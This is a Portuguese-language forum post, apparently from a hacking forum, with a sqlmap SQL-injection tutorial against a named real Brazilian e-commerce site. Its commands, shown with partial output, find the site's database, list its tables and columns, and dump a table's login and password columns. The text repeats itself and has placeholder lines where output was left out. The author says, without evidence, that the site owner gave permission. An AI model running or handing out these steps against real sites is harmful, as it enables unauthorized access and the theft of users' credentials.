nesse tutorial vou tentar demonstrar uma tecnica de sql injecto pelo sqlmap.
comando para instalar no ubuntu
ele vai ser instalado em /pentest/datadase/sqlmap. lenbrando ,ele é programado em PYTHON.
vamos começar.
site a ser explorado Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
1) para verificarmos o nome do banco de dados atual."
./sqlmap.py --url "aki o site vul sem áspas " --current-db
comando
resultado
2)agora vamos listar as tabelas do banco de dados do site , no caso ,"
antiestatic" com o comando
resultado
3)vamos explorar a tabela (UserAlb) com o comando
resuldato
4)finalmente vamos extrair os dados da coluna com o comando :
resultado
obs:na maioria das vezes, o programa faz essa pergunta.
web application technology: Apache
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
escolha as exact column names apertando " 2 " e enter .
tutorial do seu amigo s0ftw43rs
visite o made in braizil
OBS. o site é real, mas eu enviei um mensagem pro administrador e ele me deixou concertar o erro, no caso eu so fiz excluir a pagina de administrador comando para instalar no ubuntu
Código:
apt-get install sqlmap
vamos começar.
site a ser explorado Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
1) para verificarmos o nome do banco de dados atual."
./sqlmap.py --url "aki o site vul sem áspas " --current-db
comando
Código:
./sqlmap.py --url http://www.antiestaticos.com.br/lista_produto.php?IDcat=20 --current-db
Código:
back-end DBMS: MySQL 5.0 [11:50:37] [INFO] fetching current database current database: 'antiestatic'
antiestatic" com o comando
Código:
./sqlmap.py --url http://www.antiestaticos.com.br/lista_produto.php?IDcat=20 -D antiestatic --tables
3)vamos explorar a tabela (UserAlb) com o comando
Código:
./sqlmap.py --url http://www.antiestaticos.com.br/lista_produto.php?IDcat=20 -D antiestatic -T UserAlb --columns
4)finalmente vamos extrair os dados da coluna com o comando :
Código:
python sqlmap.py --url http://www.antiestaticos.com.br/lista_produto.php?IDcat=20 -D antiestatic -T UserAlb -C 'login,senha' --dump
obs:na maioria das vezes, o programa faz essa pergunta.
web application technology: Apache
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
escolha as exact column names apertando " 2 " e enter .
tutorial do seu amigo s0ftw43rs
visite o made in braizil
[voce nao pode depender de tool's
Comment